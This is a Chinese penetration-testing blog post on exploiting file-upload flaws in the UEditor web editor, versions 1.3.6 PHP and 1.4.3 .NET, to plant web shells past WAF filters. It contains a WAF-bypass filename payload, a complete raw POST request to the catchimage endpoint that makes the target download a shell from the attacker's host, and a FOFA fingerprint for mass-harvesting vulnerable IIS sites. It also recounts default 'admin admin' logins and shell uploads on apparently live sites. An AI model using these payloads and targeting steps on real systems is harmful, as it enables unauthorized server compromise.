1. 首页
  2. 渗透测试

ueditor1.4.3-某护中asmx上传绕过waf

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

前言: 

这段时间老是碰到ueditor,前段时间hvv有红队也通过这拿到shell,谈下编辑器的上传。

ueditor1.4.3-某护中asmx上传绕过waf

昨天晚上,群里有个哥们发了个ueditor的编辑器上传,总之他绕过了图片限制,ueditor的解析url是ip的格式,但传webshell老是403,我也摸了下,总结了一些原因。

如果ueditor上传目录能解析脚本,只是单纯waf拦截的话:

bypass:poc:jpg?.a?s?m?x

ueditor1.4.3-某护中asmx上传绕过waf

先来说说ueditor1.4.3这编辑器的漏洞,18年出的net格式的上传,可上传绕过的版本有

ueditor/ 1.4.3 net

ueditor/ 1.3.6 net(实际测试不行)

ueditor/ 1.3.6 php

1.3.6环境绕过:

解析漏洞

ueditor 1.3.6 X-Powered-By: ThinkPHP + apache(换行解析和后缀名解析)

以上环境本地均能绕过文件上传

0x00 1.3.6的上传

上传文件Uploader.class.php 192行,文件后缀由$fileName = f o r m a t . format. format.ext; 控制,

226行,$ext不可控

private function getFileExt(){    return strtolower( strrchr( $this->file[ "name" ] , '.' ) );}

ueditor1.4.3-某护中asmx上传绕过waf

但1.3.6文件命名引入了format这个函数
而在imageUp.php里30-35行定义了format函数是直接post传参,这处可控

ueditor1.4.3-某护中asmx上传绕过waf

实际演示poc:
给format传入参数,配合apache解析漏洞,比如传入1,可以自定义文件头

ueditor1.4.3-某护中asmx上传绕过waf

0x02. 1.4.3net版本文件上传

这版本在hvv经常遇到,但实际利用起来很鸡肋,

1.上传接口要能访问,不被策略拦截,

2.上传是否能绕过image,

3.上传目录脚本解析策略((2022年大部分ueditor都做了策略))

挖了大概有10来个ueditor站,大部分均存在服务器脚本解析。

案例1: 帮群友看的站

上传aspx成功,但访问403,上传有缺陷的aspx代码,报错但返回200

ueditor1.4.3-某护中asmx上传绕过waf

不知道什么原因,觉得可能是黑名单的问题,测试了ashx、asmx等都存在该问题,觉得不是服务器正则

google被动收集找了个ueditor,指纹(iis7.5 asp.net)的站点测试,发现是上传目录禁止执行脚本文件

ueditor1.4.3-某护中asmx上传绕过waf

2022年了,google的被动信息收集真鸡肋,大部分都只能作为探测敏感信息的入口了

google测了5-6个站,大部分站收录的结果都玩不了,还是转向fofa的主动收集

某指纹: app=“百度-UEditor” && server=“Microsoft-IIS/7.5”

结果还不错,测试了一波后

ueditor1.4.3-某护中asmx上传绕过waf

反手 admin admin
收录的结果在二级目录都存在ueditor编辑器的目录

套上ueditor文件上传poc

POST /resources/htmleditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1Host: rhost:rportCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 53
source%5B%5D=http://ip:port/asmxx.jpg?.asmx

这里贴上tool绕过waf的poc:jpg?.a?s?m?x

ueditor1.4.3-某护中asmx上传绕过waf

看到上传成功,还是回到刚那个话题: 上传目录是否能解析脚本?
asmx是asp.net通过SOAP协议生成发送消息的功能。大概率能绕过正则

ueditor1.4.3-某护中asmx上传绕过waf

ueditor1.4.3-某护中asmx上传绕过waf

总结:

1.ueditor 1.4.3文件上传主站通常难绕过上传,403,出洞的大多数在C段
2.测绘批量收集ueditor的资产

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/6052.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息